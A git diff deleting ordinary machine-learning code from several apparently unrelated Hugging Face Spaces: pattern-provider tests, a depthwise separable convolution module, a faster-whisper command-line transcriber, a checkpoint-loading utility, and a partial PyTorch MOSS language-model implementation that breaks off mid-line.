pattern_provider_2 = DelayedPatternProvider(n_q, list(range(n_q))) - pattern_provider_3 = DelayedPatternProvider(n_q, [0] + [1] * (n_q - 1)) - pattern_provider_4 = UnrolledPatternProvider( - n_q, flattening=list(range(n_q)), delays=[0] * n_q - ) - pattern_provider_5 = UnrolledPatternProvider( - n_q, flattening=[0] + [1] * (n_q - 1), delays=[0] * n_q - ) - pattern_provider_6 = UnrolledPatternProvider( - n_q, flattening=[0] + [1] * (n_q - 1), delays=[0] + [5] * (n_q - 1) - ) - return [ - pattern_provider_1, - pattern_provider_2, - pattern_provider_3, - pattern_provider_4, - pattern_provider_5, - pattern_provider_6, - ] - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [16, 72]) - def test_build_pattern_sequence(self, n_q: int, timesteps: int): - bs = 2 - card = 256 - special_token = card - - pattern_providers = self._get_pattern_providers(n_q) - for pattern_provider in pattern_providers: - pattern = pattern_provider.get_pattern(timesteps) - # we can correctly build the sequence from the pattern - z = torch.randint(0, card, (bs, n_q, timesteps)) - ref_res = self.ref_build_pattern_sequence(z, pattern, special_token) - res, indexes, mask = pattern.build_pattern_sequence(z, special_token) - assert (res == ref_res).float().mean() == 1.0 - - # expected assertion fails on the number of timesteps - invalid_timesteps = [timesteps + 1] - if pattern.num_sequence_steps != pattern.timesteps: - invalid_timesteps.append(pattern.num_sequence_steps) - for i_timesteps in invalid_timesteps: - z2 = torch.randint(0, card, (bs, n_q, i_timesteps)) - with pytest.raises(AssertionError): - pattern.build_pattern_sequence(z2, special_token) - - # expected assertion fails on the number of codebooks - invalid_qs = [0, n_q - 1, n_q + 1] - for i_q in invalid_qs: - z3 = torch.randint(0, card, (bs, i_q, timesteps)) - with pytest.raises(AssertionError): - pattern.build_pattern_sequence(z3, special_token) - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [16, 72]) - def test_revert_pattern_sequence(self, n_q: int, timesteps: int): - bs = 2 - card = 256 - special_token = card - - pattern_providers = self._get_pattern_providers(n_q) - for pattern_provider in pattern_providers: - pattern = pattern_provider.get_pattern(timesteps) - # this works assuming previous tests are successful - z = torch.randint(0, card, (bs, n_q, timesteps)) - s = self.ref_build_pattern_sequence(z, pattern, special_token) - ref_out = self.ref_revert_pattern_sequence(s, pattern, special_token) - # ensure our reference script retrieve the original sequence - assert z.shape == ref_out.shape - assert (z == ref_out).float().mean() == 1.0 - # now we can test the scatter version - out, indexes, mask = pattern.revert_pattern_sequence(s, special_token) - assert out.shape == ref_out.shape - assert (out == ref_out).float().mean() == 1.0 - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [16, 72]) - @pytest.mark.parametrize("card", [1, 2, 256, 1024]) - def test_revert_pattern_logits(self, n_q: int, timesteps: int, card: int): - bs = 2 - special_token = card - logits_special_token = float('nan') - - pattern_providers = self._get_pattern_providers(n_q) - for pattern_provider in pattern_providers: - pattern = pattern_provider.get_pattern(timesteps) - # this works assuming previous tests are successful - z = torch.randint(0, card, (bs, n_q, timesteps)) - s = self.ref_build_pattern_sequence(z, pattern, special_token) - logits = torch.randn((bs, card, n_q, s.shape[-1])) - ref_out = self.ref_revert_pattern_logits(logits, pattern, logits_special_token) - # ensure our reference script retrieve the original sequence - assert ref_out.shape == torch.Size([bs, card, n_q, timesteps]) - # now we can test the scatter version - out, indexes, mask = pattern.revert_pattern_logits(logits, logits_special_token) - assert out.shape == ref_out.shape - assert (out == ref_out).float().mean() == 1.0 diff --git a/spaces/wenpeng/Sod_Inpaint/inpaint/saicinpainting/training/modules/depthwise_sep_conv.py b/spaces/wenpeng/Sod_Inpaint/inpaint/saicinpainting/training/modules/depthwise_sep_conv.py deleted file mode 100644 index 83dd15c3df1d9f40baf0091a373fa224532c9ddd..0000000000000000000000000000000000000000 --- a/spaces/wenpeng/Sod_Inpaint/inpaint/saicinpainting/training/modules/depthwise_sep_conv.py +++ /dev/null @@ -1,17 +0,0 @@ -import torch -import torch.nn as nn - -class DepthWiseSeperableConv(nn.Module): - def __init__(self, in_dim, out_dim, *args, **kwargs): - super().__init__() - if 'groups' in kwargs: - # ignoring groups for Depthwise Sep Conv - del kwargs['groups'] - - self.depthwise = nn.Conv2d(in_dim, in_dim, *args, groups=in_dim, **kwargs) - self.pointwise = nn.Conv2d(in_dim, out_dim, kernel_size=1) - - def forward(self, x): - out = self.depthwise(x) - out = self.pointwise(out) - return out \ No newline at end of file diff --git a/spaces/wong26/faster-whisper-webui/cli.py b/spaces/wong26/faster-whisper-webui/cli.py deleted file mode 100644 index e0e21f2a6255db83bbc2c6e5ad08c56e85f7ac9b..0000000000000000000000000000000000000000 --- a/spaces/wong26/faster-whisper-webui/cli.py +++ /dev/null @@ -1,188 +0,0 @@ -import argparse -import os -import pathlib -from urllib.parse import urlparse -import warnings -import numpy as np - -import torch -from app import VadOptions, WhisperTranscriber -from src.config import VAD_INITIAL_PROMPT_MODE_VALUES, ApplicationConfig, VadInitialPromptMode -from src.download import download_url -from src.languages import get_language_names - -from src.utils import optional_float, optional_int, str2bool -from src.whisper.whisperFactory import create_whisper_container - -def cli(): - app_config = ApplicationConfig.create_default() - whisper_models = app_config.get_model_names() - - # For the CLI, we fallback to saving the output to the current directory - output_dir = app_config.output_dir if app_config.output_dir is not None else "." - - # Environment variable overrides - default_whisper_implementation = os.environ.get("WHISPER_IMPLEMENTATION", app_config.whisper_implementation) - - parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) - parser.add_argument("audio", nargs="+", type=str, \ - help="audio file(s) to transcribe") - parser.add_argument("--model", default=app_config.default_model_name, choices=whisper_models, \ - help="name of the Whisper model to use") # medium - parser.add_argument("--model_dir", type=str, default=app_config.model_dir, \ - help="the path to save model files; uses ~/.cache/whisper by default") - parser.add_argument("--device", default=app_config.device, \ - help="device to use for PyTorch inference") - parser.add_argument("--output_dir", "-o", type=str, default=output_dir, \ - help="directory to save the outputs") - parser.add_argument("--verbose", type=str2bool, default=app_config.verbose, \ - help="whether to print out the progress and debug messages") - parser.add_argument("--whisper_implementation", type=str, default=default_whisper_implementation, choices=["whisper", "faster-whisper"],\ - help="the Whisper implementation to use") - - parser.add_argument("--task", type=str, default=app_config.task, choices=["transcribe", "translate"], \ - help="whether to perform X->X speech recognition ('transcribe') or X->English translation ('translate')") - parser.add_argument("--language", type=str, default=app_config.language, choices=sorted(get_language_names()), \ - help="language spoken in the audio, specify None to perform language detection") - - parser.add_argument("--vad", type=str, default=app_config.default_vad, choices=["none", "silero-vad", "silero-vad-skip-gaps", "silero-vad-expand-into-gaps", "periodic-vad"], \ - help="The voice activity detection algorithm to use") # silero-vad - parser.add_argument("--vad_initial_prompt_mode", type=str, default=app_config.vad_initial_prompt_mode, choices=VAD_INITIAL_PROMPT_MODE_VALUES, \ - help="Whether or not to prepend the initial prompt to each VAD segment (prepend_all_segments), or just the first segment (prepend_first_segment)") # prepend_first_segment - parser.add_argument("--vad_merge_window", type=optional_float, default=app_config.vad_merge_window, \ - help="The window size (in seconds) to merge voice segments") - parser.add_argument("--vad_max_merge_size", type=optional_float, default=app_config.vad_max_merge_size,\ - help="The maximum size (in seconds) of a voice segment") - parser.add_argument("--vad_padding", type=optional_float, default=app_config.vad_padding, \ - help="The padding (in seconds) to add to each voice segment") - parser.add_argument("--vad_prompt_window", type=optional_float, default=app_config.vad_prompt_window, \ - help="The window size of the prompt to pass to Whisper") - parser.add_argument("--vad_cpu_cores", type=int, default=app_config.vad_cpu_cores, \ - help="The number of CPU cores to use for VAD pre-processing.") # 1 - parser.add_argument("--vad_parallel_devices", type=str, default=app_config.vad_parallel_devices, \ - help="A commma delimited list of CUDA devices to use for parallel processing. If None, disable parallel processing.") # "" - parser.add_argument("--auto_parallel", type=bool, default=app_config.auto_parallel, \ - help="True to use all available GPUs and CPU cores for processing. Use vad_cpu_cores/vad_parallel_devices to specify the number of CPU cores/GPUs to use.") # False - - parser.add_argument("--temperature", type=float, default=app_config.temperature, \ - help="temperature to use for sampling") - parser.add_argument("--best_of", type=optional_int, default=app_config.best_of, \ - help="number of candidates when sampling with non-zero temperature") - parser.add_argument("--beam_size", type=optional_int, default=app_config.beam_size, \ - help="number of beams in beam search, only applicable when temperature is zero") - parser.add_argument("--patience", type=float, default=app_config.patience, \ - help="optional patience value to use in beam decoding, as in https://arxiv.org/abs/2204.05424, the default (1.0) is equivalent to conventional beam search") - parser.add_argument("--length_penalty", type=float, default=app_config.length_penalty, \ - help="optional token length penalty coefficient (alpha) as in https://arxiv.org/abs/1609.08144, uses simple lengt normalization by default") - - parser.add_argument("--suppress_tokens", type=str, default=app_config.suppress_tokens, \ - help="comma-separated list of token ids to suppress during sampling; '-1' will suppress most special characters except common punctuations") - parser.add_argument("--initial_prompt", type=str, default=app_config.initial_prompt, \ - help="optional text to provide as a prompt for the first window.") - parser.add_argument("--condition_on_previous_text", type=str2bool, default=app_config.condition_on_previous_text, \ - help="if True, provide the previous output of the model as a prompt for the next window; disabling may make the text inconsistent across windows, but the model becomes less prone to getting stuck in a failure loop") - parser.add_argument("--fp16", type=str2bool, default=app_config.fp16, \ - help="whether to perform inference in fp16; True by default") - parser.add_argument("--compute_type", type=str, default=app_config.compute_type, choices=["default", "auto", "int8", "int8_float16", "int16", "float16", "float32"], \ - help="the compute type to use for inference") - - parser.add_argument("--temperature_increment_on_fallback", type=optional_float, default=app_config.temperature_increment_on_fallback, \ - help="temperature to increase when falling back when the decoding fails to meet either of the thresholds below") - parser.add_argument("--compression_ratio_threshold", type=optional_float, default=app_config.compression_ratio_threshold, \ - help="if the gzip compression ratio is higher than this value, treat the decoding as failed") - parser.add_argument("--logprob_threshold", type=optional_float, default=app_config.logprob_threshold, \ - help="if the average log probability is lower than this value, treat the decoding as failed") - parser.add_argument("--no_speech_threshold", type=optional_float, default=app_config.no_speech_threshold, \ - help="if the probability of the <|nospeech|> token is higher than this value AND the decoding has failed due to `logprob_threshold`, consider the segment as silence") - - parser.add_argument("--word_timestamps", type=str2bool, default=app_config.word_timestamps, - help="(experimental) extract word-level timestamps and refine the results based on them") - parser.add_argument("--prepend_punctuations", type=str, default=app_config.prepend_punctuations, - help="if word_timestamps is True, merge these punctuation symbols with the next word") - parser.add_argument("--append_punctuations", type=str, default=app_config.append_punctuations, - help="if word_timestamps is True, merge these punctuation symbols with the previous word") - parser.add_argument("--highlight_words", type=str2bool, default=app_config.highlight_words, - help="(requires --word_timestamps True) underline each word as it is spoken in srt and vtt") - parser.add_argument("--threads", type=optional_int, default=0, - help="number of threads used by torch for CPU inference; supercedes MKL_NUM_THREADS/OMP_NUM_THREADS") - - args = parser.parse_args().__dict__ - model_name: str = args.pop("model") - model_dir: str = args.pop("model_dir") - output_dir: str = args.pop("output_dir") - device: str = args.pop("device") - os.makedirs(output_dir, exist_ok=True) - - if (threads := args.pop("threads")) > 0: - torch.set_num_threads(threads) - - whisper_implementation = args.pop("whisper_implementation") - print(f"Using {whisper_implementation} for Whisper") - - if model_name.endswith(".en") and args["language"] not in {"en", "English"}: - warnings.warn(f"{model_name} is an English-only model but receipted '{args['language']}'; using English instead.") - args["language"] = "en" - - temperature = args.pop("temperature") - temperature_increment_on_fallback = args.pop("temperature_increment_on_fallback") - if temperature_increment_on_fallback is not None: - temperature = tuple(np.arange(temperature, 1.0 + 1e-6, temperature_increment_on_fallback)) - else: - temperature = [temperature] - - vad = args.pop("vad") - vad_initial_prompt_mode = args.pop("vad_initial_prompt_mode") - vad_merge_window = args.pop("vad_merge_window") - vad_max_merge_size = args.pop("vad_max_merge_size") - vad_padding = args.pop("vad_padding") - vad_prompt_window = args.pop("vad_prompt_window") - vad_cpu_cores = args.pop("vad_cpu_cores") - auto_parallel = args.pop("auto_parallel") - - compute_type = args.pop("compute_type") - highlight_words = args.pop("highlight_words") - - transcriber = WhisperTranscriber(delete_uploaded_files=False, vad_cpu_cores=vad_cpu_cores, app_config=app_config) - transcriber.set_parallel_devices(args.pop("vad_parallel_devices")) - transcriber.set_auto_parallel(auto_parallel) - - model = create_whisper_container(whisper_implementation=whisper_implementation, model_name=model_name, - device=device, compute_type=compute_type, download_root=model_dir, models=app_config.models) - - if (transcriber._has_parallel_devices()): - print("Using parallel devices:", transcriber.parallel_device_list) - - for audio_path in args.pop("audio"): - sources = [] - - # Detect URL and download the audio - if (uri_validator(audio_path)): - # Download from YouTube/URL directly - for source_path in download_url(audio_path, maxDuration=-1, destinationDirectory=output_dir, playlistItems=None): - source_name = os.path.basename(source_path) - sources.append({ "path": source_path, "name": source_name }) - else: - sources.append({ "path": audio_path, "name": os.path.basename(audio_path) }) - - for source in sources: - source_path = source["path"] - source_name = source["name"] - - vadOptions = VadOptions(vad, vad_merge_window, vad_max_merge_size, vad_padding, vad_prompt_window, - VadInitialPromptMode.from_string(vad_initial_prompt_mode)) - - result = transcriber.transcribe_file(model, source_path, temperature=temperature, vadOptions=vadOptions, **args) - - transcriber.write_result(result, source_name, output_dir, highlight_words) - - transcriber.close() - -def uri_validator(x): - try: - result = urlparse(x) - return all([result.scheme, result.netloc]) - except: - return False - -if __name__ == '__main__': - cli() \ No newline at end of file diff --git a/spaces/xdecoder/Demo/utils/model_loading.py b/spaces/xdecoder/Demo/utils/model_loading.py deleted file mode 100644 index e679cb7f59f19a3834110ace1f56a1bd077d0049..0000000000000000000000000000000000000000 --- a/spaces/xdecoder/Demo/utils/model_loading.py +++ /dev/null @@ -1,42 +0,0 @@ -# -------------------------------------------------------- -# X-Decoder -- Generalized Decoding for Pixel, Image, and Language -# Copyright (c) 2022 Microsoft -# Licensed under The MIT License [see LICENSE for details] -# Written by Xueyan Zou (xueyan@cs.wisc.edu) -# -------------------------------------------------------- - -import logging -from utils.distributed import is_main_process -logger = logging.getLogger(__name__) - - -def align_and_update_state_dicts(model_state_dict, ckpt_state_dict): - model_keys = sorted(model_state_dict.keys()) - ckpt_keys = sorted(ckpt_state_dict.keys()) - result_dicts = {} - matched_log = [] - unmatched_log = [] - unloaded_log = [] - for model_key in model_keys: - model_weight = model_state_dict[model_key] - if model_key in ckpt_keys: - ckpt_weight = ckpt_state_dict[model_key] - if model_weight.shape == ckpt_weight.shape: - result_dicts[model_key] = ckpt_weight - ckpt_keys.pop(ckpt_keys.index(model_key)) - matched_log.append("Loaded {}, Model Shape: {} <-> Ckpt Shape: {}".format(model_key, model_weight.shape, ckpt_weight.shape)) - else: - unmatched_log.append("*UNMATCHED* {}, Model Shape: {} <-> Ckpt Shape: {}".format(model_key, model_weight.shape, ckpt_weight.shape)) - else: - unloaded_log.append("*UNLOADED* {}, Model Shape: {}".format(model_key, model_weight.shape)) - - if is_main_process(): - for info in matched_log: - logger.info(info) - for info in unloaded_log: - logger.warning(info) - for key in ckpt_keys: - logger.warning("$UNUSED$ {}, Ckpt Shape: {}".format(key, ckpt_state_dict[key].shape)) - for info in unmatched_log: - logger.warning(info) - return result_dicts \ No newline at end of file diff --git a/spaces/xnetba/Chat_advance/modules/models/modeling_moss.py b/spaces/xnetba/Chat_advance/modules/models/modeling_moss.py deleted file mode 100644 index b7adea5bca857f7fdd6399dde7ce359f8f8cecfe..0000000000000000000000000000000000000000 --- a/spaces/xnetba/Chat_advance/modules/models/modeling_moss.py +++ /dev/null @@ -1,711 +0,0 @@ -""" PyTorch Moss model.""" - -from typing import Optional, Tuple, Union - -import torch -import torch.utils.checkpoint -from torch import nn -from torch.nn import CrossEntropyLoss - -from transformers.activations import ACT2FN -from transformers.modeling_utils import PreTrainedModel -from transformers.modeling_outputs import BaseModelOutputWithPast, CausalLMOutputWithPast -from transformers.utils import ( - add_code_sample_docstrings, - add_start_docstrings, - add_start_docstrings_to_model_forward, - logging -) - -from .configuration_moss import MossConfig - - -logger = logging.get_logger(__name__) - -_CHECKPOINT_FOR_DOC = "fnlp/moss-moon-003-base" -_CONFIG_FOR_DOC = "MossConfig" - - -MOSS_PRETRAINED_MODEL_ARCHIVE_LIST = [ - "fnlp/moss-moon-003-base", - "fnlp/moss-moon-003-sft", - "fnlp/moss-moon-003-sft-plugin", -] - - -# Copied from transformers.models.gptj.modeling_gptj.create_sinusoidal_positions -def create_sinusoidal_positions(num_pos: int, dim: int) -> torch.Tensor: - inv_freq = 1.0 / (10000 ** (torch.arange(0, dim, 2) / dim)) - sinusoid_inp = torch.einsum("i , j -> i j", torch.arange(num_pos, dtype=torch.float), inv_freq).float() - return torch.cat((torch.sin(sinusoid_inp), torch.cos(sinusoid_inp)), dim=1) - - -# Copied from transformers.models.gptj.modeling_gptj.rotate_every_two -def rotate_every_two(x: torch.Tensor) -> torch.Tensor: - x1 = x[:, :, :, ::2] - x2 = x[:, :, :, 1::2] - x = torch.stack((-x2, x1), dim=-1) - return x.flatten(-2) # in einsum notation: rearrange(x, '... d j -> ... (d j)') - - -# Copied from transformers.models.gptj.modeling_gptj.apply_rotary_pos_emb -def apply_rotary_pos_emb(tensor: torch.Tensor, sin: torch.Tensor, cos: torch.Tensor) -> torch.Tensor: - sin = torch.repeat_interleave(sin[:, :, None, :], 2, 3) - cos = torch.repeat_interleave(cos[:, :, None, :], 2, 3) - return (tensor * cos) + (rotate_every_two(tensor) * sin) - - -class MossAttention(nn.Module): - def __init__(self, config): - super().__init__() - - max_positions = config.max_position_embeddings - self.register_buffer( - "causal_mask", - torch.tril(torch.ones((max_positions, max_positions), dtype=torch.bool)).view( - 1, 1, max_positions, max_positions - ), - ) - - self.attn_dropout = nn.Dropout(config.attn_pdrop) - self.resid_dropout = nn.Dropout(config.resid_pdrop) - - self.embed_dim = config.hidden_size - self.num_attention_heads = config.num_attention_heads - self.head_dim = self.embed_dim // self.num_attention_heads - if self.head_dim * self.num_attention_heads != self.embed_dim: - raise ValueError( - f"embed_dim must be divisible by num_attention_heads (got `embed_dim`: {self.embed_dim} and" - f" `num_attention_heads`: {self.num_attention_heads})." - ) - self.scale_attn = torch.sqrt(torch.tensor(self.head_dim, dtype=torch.float32)).to(torch.get_default_dtype()) - self.qkv_proj = nn.Linear(self.embed_dim, self.embed_dim * 3, bias=False) - - self.out_proj = nn.Linear(self.embed_dim, self.embed_dim, bias=False) - self.rotary_dim = config.rotary_dim - pos_embd_dim = self.rotary_dim or self.embed_dim - self.embed_positions = create_sinusoidal_positions(max_positions, pos_embd_dim) - - def _split_heads(self, x, n_head, dim_head, mp_num): - reshaped = x.reshape(x.shape[:-1] + (n_head // mp_num, dim_head)) - reshaped = reshaped.reshape(x.shape[:-2] + (-1,) + reshaped.shape[-1:]) - return reshaped - - def _merge_heads(self, tensor, num_attention_heads, attn_head_size): - """ - Merges attn_head_size dim and num_attn_heads dim into n_ctx - """ - if len(tensor.shape) == 5: - tensor = tensor.permute(0, 1, 3, 2, 4).contiguous() - elif len(tensor.shape) == 4: - tensor = tensor.permute(0, 2, 1, 3).contiguous() - else: - raise ValueError(f"Input tensor rank should be one of [4, 5], but is: {len(tensor.shape)}") - new_shape = tensor.size()[:-2] + (num_attention_heads * attn_head_size,) - return tensor.view(new_shape) - - def _attn( - self, - query, - key, - value, - attention_mask=None, - head_mask=None, - ): - # compute causal mask from causal mask buffer - query_length, key_length = query.size(-2), key.size(-2) - causal_mask = self.causal_mask[:, :, key_length - query_length : key_length, :key_length] - - # Keep the attention weights computation in fp32 to avoid overflow issues - query = query.to(torch.float32) - key = key.to(torch.float32) - - attn_weights = torch.matmul(query, key.transpose(-1, -2)) - - attn_weights = attn_weights / self.scale_attn - mask_value = torch.finfo(attn_weights.dtype).min - # Need to be a tensor, otherwise we get error: `RuntimeError: expected scalar type float but found double`. - # Need to be on the same device, otherwise `RuntimeError: ..., x and y to be on the same device` - mask_value = torch.tensor(mask_value, dtype=attn_weights.dtype).to(attn_weights.device) - attn_weights = torch.where(causal_mask, attn_weights, mask_value) - - if attention_mask is not None: - # Apply the attention mask - attn_weights = attn_weights + attention_mask - - attn_weights = nn.Softmax(dim=-1)(attn_weights) - attn_weights = attn_weights.to(value.dtype) - attn_weights = self.attn_dropout(attn_weights) - - # Mask heads if we want to - if head_mask is not None: - attn_weights = attn_weights * head_mask - - attn_output = torch.matmul(attn_weights, value) - - return attn_output, attn_weights - - def forward( - self, - hidden_states: Optional[torch.FloatTensor], - layer_past: Optional[Tuple[torch.Tensor]] = None, - attention_mask: Optional[torch.FloatTensor] = None, - position_ids: Optional[torch.LongTensor] = None, - head_mask: Optional[torch.FloatTensor] = None, - use_cache: Optional[bool] = False, - output_attentions: Optional[bool] = False, - ) -> Union[ - Tuple[torch.Tensor, Tuple[torch.Tensor]], - Optional[Tuple[torch.Tensor, Tuple[torch.Tensor], Tuple[torch.Tensor, ...]]], - ]: - qkv = self.qkv_proj(hidden_states) - # TODO(enijkamp): factor out number of logical TPU-v4 cores or make forward pass agnostic - mp_num = 4 - qkv_split = qkv.reshape(qkv.shape[:-1] + (mp_num, -1)) - - local_dim = self.head_dim * self.num_attention_heads // mp_num - query, value, key = torch.split(qkv_split, local_dim, dim=-1) - query = self._split_heads(query, self.num_attention_heads, self.head_dim, mp_num=mp_num) - key = self._split_heads(key, self.num_attention_heads, self.head_dim, mp_num=mp_num) - - value = self._split_heads(value, self.num_attention_heads, self.head_dim, mp_num=mp_num) - value = value.permute(0, 2, 1, 3) - - embed_positions = self.embed_positions - if embed_positions.device != position_ids.device: - embed_positions = embed_positions.to(position_ids.device) - self.embed_positions = embed_positions - - sincos = embed_positions[position_ids] - sin, cos = torch.split(sincos, sincos.shape[-1] // 2, dim=-1) - - if self.rotary_dim is not None: - k_rot = key[:, :, :, : self.rotary_dim] - k_pass = key[:, :, :, self.rotary_dim :] - - q_rot = query[:, :, :, : self.rotary_dim] - q_pass = query[:, :, :, self.rotary_dim :] - - k_rot = apply_rotary_pos_emb(k_rot, sin, cos) - q_rot = apply_rotary_pos_emb(q_rot, sin, cos) - - key = torch.cat([k_rot, k_pass], dim=-1) - query = torch.cat([q_rot, q_pass], dim=-1) - else: - key = apply_rotary_pos_emb(key, sin, cos) - query = apply_rotary_pos_emb(query, sin, cos) - - key = key.permute(0, 2, 1, 3) - query = query.permute(0, 2, 1, 3) - - if layer_past is not None: - past_key = layer_past[0] - past_value = layer_past[1] - key = torch.cat((past_key, key), dim=-2) - value = torch.cat((past_value, value), dim=-2) - - if use_cache is True: - present = (key, value) - else: - present = None - - # compute self-attention: V x Softmax(QK^T) - attn_output, attn_weights = self._attn(query, key, value, attention_mask, head_mask) - - attn_output = self._merge_heads(attn_output, self.num_attention_heads, self.head_dim) - attn_output = self.out_proj(attn_output) - attn_output = self.resid_dropout(attn_output) - - outputs = (attn_output, present) - if output_attentions: - outputs += (attn_weights,) - - return outputs # a, present, (attentions) - - -# Copied from transformers.models.gptj.modeling_gptj.GPTJMLP with GPTJ->Moss -class MossMLP(nn.Module): - def __init__(self, intermediate_size, config): # in MLP: intermediate_size= 4 * embed_dim - super().__init__() - embed_dim = config.n_embd - - self.fc_in = nn.Linear(embed_dim, intermediate_size) - self.fc_out = nn.Linear(intermediate_size, embed_dim) - - self.act = ACT2FN[config.activation_function] - self.dropout = nn.Dropout(config.resid_pdrop) - - def forward(self, hidden_states: Optional[torch.FloatTensor]) -> torch.FloatTensor: - hidden_states = self.fc_in(hidden_states) - hidden_states = self.act(hidden_states) - hidden_states = self.fc_out(hidden_states) - hidden_states = self.dropout(hidden_states) - return hidden_states - - -# Copied from transformers.models.gptj.modeling_gptj.GPTJBlock with GPTJ->Moss -class MossBlock(nn.Module): - def __init__(self, config): - super().__init__() - inner_dim = config.n_inner if config.n_inner is not None else 4 * config.n_embd - self.ln_1 = nn.LayerNorm(config.n_embd, eps=config.layer_norm_epsilon) - self.attn = MossAttention(config) - self.mlp = MossMLP(inner_dim, config) - - def forward( - self, - hidden_states: Optional[torch.FloatTensor], - layer_past: Optional[Tuple[torch.Tensor]] = None, - attention_mask: Optional[torch.FloatTensor] = None, - position_ids: Optional[torch.LongTensor] = None, - head_mask: Optional[torch.FloatTensor] = None, - use_cache: Optional[bool] = False, - output_attentions: Optional[bool] = False, - ) -> Union[Tuple[torch.Tensor], Optional[Tuple[torch.Tensor, Tuple[torch.FloatTensor, ...]]]]: - residual = hidden_states - hidden_states = self.ln_1(hidden_states) - attn_outputs = self.attn( - hidden_states=hidden_states, - layer_past=layer_past, - attention_mask=attention_mask, - position_ids=position_ids, - head_mask=head_mask, - use_cache=use_cache, - output_attentions=output_attentions, - ) - attn_output = attn_outputs[0] # output_attn: a, present, (attentions) - outputs = attn_outputs[1:] - - feed_forward_hidden_states = self.mlp(hidden_states) - hidden_states = attn_output + feed_forward_hidden_states + residual - - if use_cache: - outputs = (hidden_states,) + outputs - else: - outputs = (hidden_states,) + outputs[1:] - - return outputs # hidden_states, present, (attentions) - - -class MossPreTrainedModel(PreTrainedModel): - """ - An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained - models. - """ - - config_class = MossConfig - base_model_prefix = "transformer" - supports_gradient_checkpointing = True - _no_split_modules = ["MossBlock"] - - def __init__(self, *inputs, **kwargs): - super().__init__(*inputs, **kwargs) - - def _init_weights(self, module): - """Initialize the weights.""" - if isinstance(module, (nn.Linear,)): - # Slightly different from Mesh Transformer JAX which uses truncated_normal for initialization - # cf https://github.com/pytorch/pytorch/pull/5617 - module.weight.data.normal_(mean=0.0, std=self.config.initializer_range) - if module.bias is not None: - module.bias.data.zero_() - elif isinstance(module, nn.Embedding): - module.weight.data.normal_(mean=0.0, std=self.config.initializer_range) - if module.padding_idx is not None: - module.weight.data[module.padding_idx].zero_() - elif isinstance(module, nn.LayerNorm): - module.bias.data.zero_() - module.weight.data.fill_(1.0) - - def _set_gradient_checkpointing(self, module, value=False): - if isinstance(module, MossModel): - module.gradient_checkpointing = value - - -MOSS_START_DOCSTRING = r""" - This model is a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) sub-class. Use - it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage and - behavior. - - Parameters: - config ([`MossConfig`]): Model configuration class with all the parameters of the model. - Initializing with a config file does not load the weights associated with the model, only the - configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights. -""" - -MOSS_INPUTS_DOCSTRING = r""" - Args: - input_ids (`torch.LongTensor` of shape `({0})`): - Indices of input sequence tokens in the vocabulary. - - Indices can be obtained using [`AutoProcenizer`]. See [`PreTrainedTokenizer.encode`] and - [`PreTrainedTokenizer.__call__`] for details. - - [What are input IDs?](../glossary#input-ids) - attention_mask (`torch.FloatTensor` of shape `({0})`, *optional*): - Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`: - - - 1 for tokens that are **not masked**, - - 0 for tokens that are **masked**. - - [What are attention masks?](../glossary#attention-mask) - token_type_ids (`torch.LongTensor` of shape `({0})`, *optional*): - Segment token indices to indicate first and second portions of the inputs. Indices are selected in `[0, - 1]`: - - - 0 corresponds to a *sentence A* token, - - 1 corresponds to a *sentence B* token. - - [What are token type IDs?](../glossary#token-type-ids) - position_ids (`torch.LongTensor` of shape `({0})`, *optional*): - Indices of positions of each input sequence tokens in the position embeddings. Selected in the range `[0, - config.n_positions - 1]`. - - [What are position IDs?](../glossary#position-ids) - head_mask (`torch.FloatTensor` of shape `(num_attention_heads,)` or `(n_layer, num_attention_heads)`, *optional*): - Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`: - - - 1 indicates the head is **not masked**, - - 0 indicates the head is **masked**. - - inputs_embeds (`torch.FloatTensor` of shape `({0}, hidden_dim)`, *optional*): - Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. This - is useful if you want more control over how to convert *input_ids* indices into associated vectors than the - model's internal embedding lookup matrix. - output_attentions (`bool`, *optional*): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned - tensors for more detail. - output_hidden_states (`bool`, *optional*): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for - more detail. - return_dict (`bool`, *optional*): - Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. -""" - - -@add_start_docstrings( - "The bare Moss Model transformer outputting raw hidden-states without any specific head on top.", - MOSS_START_DOCSTRING, -) -class MossModel(MossPreTrainedModel): - def __init__(self, config): - super().__init__(config) - - self.embed_dim = config.n_embd - self.vocab_size = config.vocab_size - self.wte = nn.Embedding(config.vocab_size, self.embed_dim) - self.drop = nn.Dropout(config.embd_pdrop) - self.h = nn.ModuleList([MossBlock(config) for _ in range(config.n_layer)]) - self.ln_f = nn.LayerNorm(self.embed_dim, eps=config.layer_norm_epsilon) - self.rotary_dim = min(config.rotary_dim, config.n_ctx // config.num_attention_heads) - - self.gradient_checkpointing = False - - # Initialize weights and apply final processing - self.post_init() - - def get_input_embeddings(self): - return self.wte - - def set_input_embeddings(self, new_embeddings): - self.wte = new_embeddings - - @add_start_docstrings_to_model_forward(MOSS_INPUTS_DOCSTRING.format("batch_size, sequence_length")) - @add_code_sample_docstrings( - checkpoint=_CHECKPOINT_FOR_DOC, - output_type=BaseModelOutputWithPast, - config_class=_CONFIG_FOR_DOC, - ) - def forward( - self, - input_ids: Optional[torch.LongTensor] = None, - past_key_values: Optional[Tuple[Tuple[torch.Tensor]]] = None, - attention_mask: Optional[torch.FloatTensor] = None, - token_type_ids: Optional[torch.LongTensor] = None, - position_ids: Optional[torch.LongTensor] = None, - head_mask: Optional[torch.FloatTensor] = None, - inputs_embeds: Optional[torch.FloatTensor] = None, - use_cache: Optional[bool] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - ) -> Union[Tuple, BaseModelOutputWithPast]: - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if 